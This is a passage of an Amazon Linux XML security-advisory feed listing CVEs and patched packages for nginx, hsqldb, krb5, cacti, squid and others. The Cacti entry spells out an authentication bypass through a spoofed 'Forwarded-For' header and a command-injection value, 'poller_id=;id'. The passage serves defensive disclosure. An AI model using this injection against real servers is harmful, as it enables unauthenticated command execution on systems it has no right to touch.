</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41741" title="" id="CVE-2022-41741" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41742" title="" id="CVE-2022-41742" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nginx-all-modules" version="1.18.0" release="1.44.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-all-modules-1.18.0-1.44.amzn1.x86_64.rpm</filename></package><package name="nginx-debuginfo" version="1.18.0" release="1.44.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-debuginfo-1.18.0-1.44.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-stream" version="1.18.0" release="1.44.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-stream-1.18.0-1.44.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-mail" version="1.18.0" release="1.44.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-mail-1.18.0-1.44.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-geoip" version="1.18.0" release="1.44.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-geoip-1.18.0-1.44.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-image-filter" version="1.18.0" release="1.44.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-image-filter-1.18.0-1.44.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-xslt-filter" version="1.18.0" release="1.44.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-xslt-filter-1.18.0-1.44.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-perl" version="1.18.0" release="1.44.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-perl-1.18.0-1.44.amzn1.x86_64.rpm</filename></package><package name="nginx" version="1.18.0" release="1.44.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-1.18.0-1.44.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-stream" version="1.18.0" release="1.44.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-stream-1.18.0-1.44.amzn1.i686.rpm</filename></package><package name="nginx-debuginfo" version="1.18.0" release="1.44.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-debuginfo-1.18.0-1.44.amzn1.i686.rpm</filename></package><package name="nginx" version="1.18.0" release="1.44.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-1.18.0-1.44.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-image-filter" version="1.18.0" release="1.44.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-image-filter-1.18.0-1.44.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-geoip" version="1.18.0" release="1.44.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-geoip-1.18.0-1.44.amzn1.i686.rpm</filename></package><package name="nginx-all-modules" version="1.18.0" release="1.44.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-all-modules-1.18.0-1.44.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-xslt-filter" version="1.18.0" release="1.44.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-xslt-filter-1.18.0-1.44.amzn1.i686.rpm</filename></package><package name="nginx-mod-mail" version="1.18.0" release="1.44.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-mail-1.18.0-1.44.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-perl" version="1.18.0" release="1.44.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-perl-1.18.0-1.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1666</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1666: important priority package update for hsqldb</title><issued date="2023-01-18 20:56:00" /><updated date="2023-01-24 17:23:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-41853:
Those using java.sql.Statement or java.sql.PreparedStatement in hsqldb (HyperSQL DataBase) to process untrusted input may be vulnerable to a remote code execution attack. By default it is allowed to call any static method of any Java class in the classpath resulting in code execution. The issue can be prevented by updating to 2.7.1 or by setting the system property "hsqldb.method_class_names" to classes which are allowed to be called. For example, System.setProperty("hsqldb.method_class_names", "abc") or Java argument -Dhsqldb.method_class_names="abc" can be used. From version 2.7.1 all classes by default are not accessible except those in java.lang.Math and need to be manually enabled.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41853" title="" id="CVE-2022-41853" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="hsqldb-javadoc" version="1.8.1.3" release="1.13.amzn1" epoch="1" arch="noarch"><filename>Packages/hsqldb-javadoc-1.8.1.3-1.13.amzn1.noarch.rpm</filename></package><package name="hsqldb-demo" version="1.8.1.3" release="1.13.amzn1" epoch="1" arch="noarch"><filename>Packages/hsqldb-demo-1.8.1.3-1.13.amzn1.noarch.rpm</filename></package><package name="hsqldb" version="1.8.1.3" release="1.13.amzn1" epoch="1" arch="noarch"><filename>Packages/hsqldb-1.8.1.3-1.13.amzn1.noarch.rpm</filename></package><package name="hsqldb-manual" version="1.8.1.3" release="1.13.amzn1" epoch="1" arch="noarch"><filename>Packages/hsqldb-manual-1.8.1.3-1.13.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1667</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1667: important priority package update for krb5</title><issued date="2023-01-18 20:56:00" /><updated date="2023-01-24 17:23:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-42898:
Integer overflow vulnerabilities in PAC parsing
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898" title="" id="CVE-2022-42898" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libkadm5" version="1.15.1" release="46.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/libkadm5-1.15.1-46.49.amzn1.x86_64.rpm</filename></package><package name="krb5-workstation" version="1.15.1" release="46.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.15.1-46.49.amzn1.x86_64.rpm</filename></package><package name="krb5-libs" version="1.15.1" release="46.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.15.1-46.49.amzn1.x86_64.rpm</filename></package><package name="krb5-devel" version="1.15.1" release="46.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.15.1-46.49.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.15.1" release="46.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-1.15.1-46.49.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.15.1" release="46.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.15.1-46.49.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.15.1" release="46.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.15.1-46.49.amzn1.x86_64.rpm</filename></package><package name="krb5-server-ldap" version="1.15.1" release="46.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.15.1-46.49.amzn1.x86_64.rpm</filename></package><package name="krb5-server-ldap" version="1.15.1" release="46.49.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.15.1-46.49.amzn1.i686.rpm</filename></package><package name="krb5-server" version="1.15.1" release="46.49.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-1.15.1-46.49.amzn1.i686.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.15.1" release="46.49.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.15.1-46.49.amzn1.i686.rpm</filename></package><package name="krb5-debuginfo" version="1.15.1" release="46.49.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-debuginfo-1.15.1-46.49.amzn1.i686.rpm</filename></package><package name="krb5-workstation" version="1.15.1" release="46.49.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.15.1-46.49.amzn1.i686.rpm</filename></package><package name="libkadm5" version="1.15.1" release="46.49.amzn1" epoch="0" arch="i686"><filename>Packages/libkadm5-1.15.1-46.49.amzn1.i686.rpm</filename></package><package name="krb5-devel" version="1.15.1" release="46.49.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.15.1-46.49.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.15.1" release="46.49.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-libs-1.15.1-46.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1668</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1668: important priority package update for bcel</title><issued date="2023-01-18 20:56:00" /><updated date="2023-01-24 17:21:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-42920:
Apache Commons BCEL has a number of APIs that would normally only allow changing specific class characteristics. However, due to an out-of-bounds writing issue, these APIs can be used to produce arbitrary bytecode. This could be abused in applications that pass attacker-controllable data to those APIs, giving the attacker more control over the resulting bytecode than otherwise expected. Update to Apache Commons BCEL 6.6.0.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42920" title="" id="CVE-2022-42920" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bcel-javadoc" version="5.2" release="7.2.10.amzn1" epoch="0" arch="noarch"><filename>Packages/bcel-javadoc-5.2-7.2.10.amzn1.noarch.rpm</filename></package><package name="bcel-manual" version="5.2" release="7.2.10.amzn1" epoch="0" arch="noarch"><filename>Packages/bcel-manual-5.2-7.2.10.amzn1.noarch.rpm</filename></package><package name="bcel" version="5.2" release="7.2.10.amzn1" epoch="0" arch="noarch"><filename>Packages/bcel-5.2-7.2.10.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1669</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1669: critical priority package update for php-pecl-memcached</title><issued date="2023-01-19 20:10:00" /><updated date="2023-01-24 17:21:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-26635:
PHP-Memcached v2.2.0 and below contains an improper NULL termination which allows attackers to execute CLRF injection.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26635" title="" id="CVE-2022-26635" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php-pecl-memcached" version="2.1.0" release="3.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pecl-memcached-2.1.0-3.6.amzn1.x86_64.rpm</filename></package><package name="php-pecl-memcached-debuginfo" version="2.1.0" release="3.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pecl-memcached-debuginfo-2.1.0-3.6.amzn1.x86_64.rpm</filename></package><package name="php-pecl-memcached" version="2.1.0" release="3.6.amzn1" epoch="0" arch="i686"><filename>Packages/php-pecl-memcached-2.1.0-3.6.amzn1.i686.rpm</filename></package><package name="php-pecl-memcached-debuginfo" version="2.1.0" release="3.6.amzn1" epoch="0" arch="i686"><filename>Packages/php-pecl-memcached-debuginfo-2.1.0-3.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1670</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1670: critical priority package update for php54-pecl-memcached</title><issued date="2023-01-19 20:10:00" /><updated date="2023-01-24 17:21:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-26635:
PHP-Memcached v2.2.0 and below contains an improper NULL termination which allows attackers to execute CLRF injection.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26635" title="" id="CVE-2022-26635" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-pecl-memcached-debuginfo" version="2.1.0" release="3.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pecl-memcached-debuginfo-2.1.0-3.10.amzn1.x86_64.rpm</filename></package><package name="php54-pecl-memcached" version="2.1.0" release="3.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pecl-memcached-2.1.0-3.10.amzn1.x86_64.rpm</filename></package><package name="php54-pecl-memcached" version="2.1.0" release="3.10.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pecl-memcached-2.1.0-3.10.amzn1.i686.rpm</filename></package><package name="php54-pecl-memcached-debuginfo" version="2.1.0" release="3.10.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pecl-memcached-debuginfo-2.1.0-3.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1671</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1671: critical priority package update for php55-pecl-memcached</title><issued date="2023-01-19 20:10:00" /><updated date="2023-01-24 17:20:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-26635:
PHP-Memcached v2.2.0 and below contains an improper NULL termination which allows attackers to execute CLRF injection.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26635" title="" id="CVE-2022-26635" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-pecl-memcached-debuginfo" version="2.2.0" release="5.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pecl-memcached-debuginfo-2.2.0-5.17.amzn1.x86_64.rpm</filename></package><package name="php55-pecl-memcached" version="2.2.0" release="5.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pecl-memcached-2.2.0-5.17.amzn1.x86_64.rpm</filename></package><package name="php55-pecl-memcached-debuginfo" version="2.2.0" release="5.17.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pecl-memcached-debuginfo-2.2.0-5.17.amzn1.i686.rpm</filename></package><package name="php55-pecl-memcached" version="2.2.0" release="5.17.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pecl-memcached-2.2.0-5.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1672</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1672: critical priority package update for php56-pecl-memcached</title><issued date="2023-01-19 20:10:00" /><updated date="2023-01-24 17:20:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-26635:
PHP-Memcached v2.2.0 and below contains an improper NULL termination which allows attackers to execute CLRF injection.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26635" title="" id="CVE-2022-26635" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-pecl-memcached" version="2.2.0" release="5.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pecl-memcached-2.2.0-5.17.amzn1.x86_64.rpm</filename></package><package name="php56-pecl-memcached-debuginfo" version="2.2.0" release="5.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pecl-memcached-debuginfo-2.2.0-5.17.amzn1.x86_64.rpm</filename></package><package name="php56-pecl-memcached" version="2.2.0" release="5.17.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pecl-memcached-2.2.0-5.17.amzn1.i686.rpm</filename></package><package name="php56-pecl-memcached-debuginfo" version="2.2.0" release="5.17.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pecl-memcached-debuginfo-2.2.0-5.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1673</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1673: critical priority package update for php70-pecl-memcached</title><issued date="2023-01-19 20:10:00" /><updated date="2023-01-24 17:20:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-26635:
PHP-Memcached v2.2.0 and below contains an improper NULL termination which allows attackers to execute CLRF injection.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26635" title="" id="CVE-2022-26635" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php70-pecl-memcached" version="3.2.0" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pecl-memcached-3.2.0-1.3.amzn1.x86_64.rpm</filename></package><package name="php70-pecl-memcached-debuginfo" version="3.2.0" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pecl-memcached-debuginfo-3.2.0-1.3.amzn1.x86_64.rpm</filename></package><package name="php70-pecl-memcached" version="3.2.0" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pecl-memcached-3.2.0-1.3.amzn1.i686.rpm</filename></package><package name="php70-pecl-memcached-debuginfo" version="3.2.0" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pecl-memcached-debuginfo-3.2.0-1.3.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1674</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1674: critical priority package update for php71-pecl-memcached</title><issued date="2023-01-19 20:10:00" /><updated date="2023-01-24 17:20:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-26635:
PHP-Memcached v2.2.0 and below contains an improper NULL termination which allows attackers to execute CLRF injection.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26635" title="" id="CVE-2022-26635" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php71-pecl-memcached" version="3.2.0" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pecl-memcached-3.2.0-1.4.amzn1.x86_64.rpm</filename></package><package name="php71-pecl-memcached-debuginfo" version="3.2.0" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pecl-memcached-debuginfo-3.2.0-1.4.amzn1.x86_64.rpm</filename></package><package name="php71-pecl-memcached-debuginfo" version="3.2.0" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pecl-memcached-debuginfo-3.2.0-1.4.amzn1.i686.rpm</filename></package><package name="php71-pecl-memcached" version="3.2.0" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pecl-memcached-3.2.0-1.4.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1675</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1675: critical priority package update for cacti</title><issued date="2023-01-19 20:10:00" /><updated date="2023-01-24 18:09:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-46169:
Cacti is an open source platform which provides a robust and extensible operational monitoring and fault management framework for users. In affected versions a command injection vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti, if a specific data source was selected for any monitored device. The vulnerability resides in the `remote_agent.php` file. This file can be accessed without authentication. This function retrieves the IP address of the client via `get_client_addr` and resolves this IP address to the corresponding hostname via `gethostbyaddr`. After this, it is verified that an entry within the `poller` table exists, where the hostname corresponds to the resolved hostname. If such an entry was found, the function returns `true` and the client is authorized. This authorization can be bypassed due to the implementation of the `get_client_addr` function. The function is defined in the file `lib/functions.php` and checks serval `$_SERVER` variables to determine the IP address of the client. The variables beginning with `HTTP_` can be arbitrarily set by an attacker. Since there is a default entry in the `poller` table with the hostname of the server running Cacti, an attacker can bypass the authentication e.g. by providing the header `Forwarded-For: <TARGETIP>`. This way the function `get_client_addr` returns the IP address of the server running Cacti. The following call to `gethostbyaddr` will resolve this IP address to the hostname of the server, which will pass the `poller` hostname check because of the default entry. After the authorization of the `remote_agent.php` file is bypassed, an attacker can trigger different actions. One of these actions is called `polldata`. The called function `poll_for_data` retrieves a few request parameters and loads the corresponding `poller_item` entries from the database. If the `action` of a `poller_item` equals `POLLER_ACTION_SCRIPT_PHP`, the function `proc_open` is used to execute a PHP script. The attacker-controlled parameter `$poller_id` is retrieved via the function `get_nfilter_request_var`, which allows arbitrary strings. This variable is later inserted into the string passed to `proc_open`, which leads to a command injection vulnerability. By e.g. providing the `poller_id=;id` the `id` command is executed. In order to reach the vulnerable call, the attacker must provide a `host_id` and `local_data_id`, where the `action` of the corresponding `poller_item` is set to `POLLER_ACTION_SCRIPT_PHP`. Both of these ids (`host_id` and `local_data_id`) can easily be bruteforced. The only requirement is that a `poller_item` with an `POLLER_ACTION_SCRIPT_PHP` action exists. This is very likely on a productive instance because this action is added by some predefined templates like `Device - Uptime` or `Device - Polling Time`. This command injection vulnerability allows an unauthenticated user to execute arbitrary commands if a `poller_item` with the `action` type `POLLER_ACTION_SCRIPT_PHP` (`2`) is configured. The authorization bypass should be prevented by not allowing an attacker to make `get_client_addr` (file `lib/functions.php`) return an arbitrary IP address. This could be done by not honoring the `HTTP_...` `$_SERVER` variables. If these should be kept for compatibility reasons it should at least be prevented to fake the IP address of the server running Cacti. This vulnerability has been addressed in both the 1.2.x and 1.3.x release branches with `1.2.23` being the first release containing the patch.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46169" title="" id="CVE-2022-46169" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cacti" version="1.1.19" release="2.20.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-1.1.19-2.20.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1676</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1676: medium priority package update for protobuf</title><issued date="2023-01-31 20:44:00" /><updated date="2023-02-04 18:16:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-22570:
A flaw was found in protobuf. The vulnerability occurs due to incorrect parsing of a NULL character in the proto symbol and leads to a Null pointer dereference. This flaw allows an attacker to execute unauthorized code or commands, read memory, modify memory.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22570" title="" id="CVE-2021-22570" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="protobuf-debuginfo" version="2.5.0" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/protobuf-debuginfo-2.5.0-1.11.amzn1.x86_64.rpm</filename></package><package name="protobuf-lite" version="2.5.0" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/protobuf-lite-2.5.0-1.11.amzn1.x86_64.rpm</filename></package><package name="protobuf-devel" version="2.5.0" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/protobuf-devel-2.5.0-1.11.amzn1.x86_64.rpm</filename></package><package name="protobuf-compiler" version="2.5.0" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/protobuf-compiler-2.5.0-1.11.amzn1.x86_64.rpm</filename></package><package name="protobuf-python26" version="2.5.0" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/protobuf-python26-2.5.0-1.11.amzn1.x86_64.rpm</filename></package><package name="protobuf-python27" version="2.5.0" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/protobuf-python27-2.5.0-1.11.amzn1.x86_64.rpm</filename></package><package name="protobuf" version="2.5.0" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/protobuf-2.5.0-1.11.amzn1.x86_64.rpm</filename></package><package name="protobuf-vim" version="2.5.0" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/protobuf-vim-2.5.0-1.11.amzn1.x86_64.rpm</filename></package><package name="protobuf-static" version="2.5.0" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/protobuf-static-2.5.0-1.11.amzn1.x86_64.rpm</filename></package><package name="protobuf-lite-devel" version="2.5.0" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/protobuf-lite-devel-2.5.0-1.11.amzn1.x86_64.rpm</filename></package><package name="protobuf-lite-static" version="2.5.0" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/protobuf-lite-static-2.5.0-1.11.amzn1.x86_64.rpm</filename></package><package name="protobuf-static" version="2.5.0" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/protobuf-static-2.5.0-1.11.amzn1.i686.rpm</filename></package><package name="protobuf-lite-devel" version="2.5.0" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/protobuf-lite-devel-2.5.0-1.11.amzn1.i686.rpm</filename></package><package name="protobuf-debuginfo" version="2.5.0" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/protobuf-debuginfo-2.5.0-1.11.amzn1.i686.rpm</filename></package><package name="protobuf-devel" version="2.5.0" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/protobuf-devel-2.5.0-1.11.amzn1.i686.rpm</filename></package><package name="protobuf-compiler" version="2.5.0" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/protobuf-compiler-2.5.0-1.11.amzn1.i686.rpm</filename></package><package name="protobuf-lite-static" version="2.5.0" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/protobuf-lite-static-2.5.0-1.11.amzn1.i686.rpm</filename></package><package name="protobuf" version="2.5.0" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/protobuf-2.5.0-1.11.amzn1.i686.rpm</filename></package><package name="protobuf-lite" version="2.5.0" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/protobuf-lite-2.5.0-1.11.amzn1.i686.rpm</filename></package><package name="protobuf-python27" version="2.5.0" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/protobuf-python27-2.5.0-1.11.amzn1.i686.rpm</filename></package><package name="protobuf-vim" version="2.5.0" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/protobuf-vim-2.5.0-1.11.amzn1.i686.rpm</filename></package><package name="protobuf-python26" version="2.5.0" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/protobuf-python26-2.5.0-1.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1677</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1677: important priority package update for squid</title><issued date="2023-01-31 20:44:00" /><updated date="2023-02-04 18:15:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-41318:
A flaw was found in Squid. An incorrect integer overflow protection in the Squid SSPI and SMB authentication helpers is vulnerable to a buffer overflow attack, resulting in information disclosure or a denial of service.
CVE-2021-46784:
In Squid 3.x through 3.5.28, 4.x through 4.17, and 5.x before 5.6, due to improper buffer management, a Denial of Service can occur when processing long Gopher server responses.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46784" title="" id="CVE-2021-46784" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41318" title="" id="CVE-2022-41318" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid" version="3.5.20" release="17.43.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-17.43.amzn1.x86_64.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.43.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-17.43.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.43.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-17.43.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.43.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-17.43.amzn1.i686.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.43.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-17.43.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.43.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-17.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1678</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1678: medium priority package update for java-1.8.0-openjdk</title><issued date="2023-01-31 20:44:00" /><updated date="2023-02-04 18:17:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-21628:
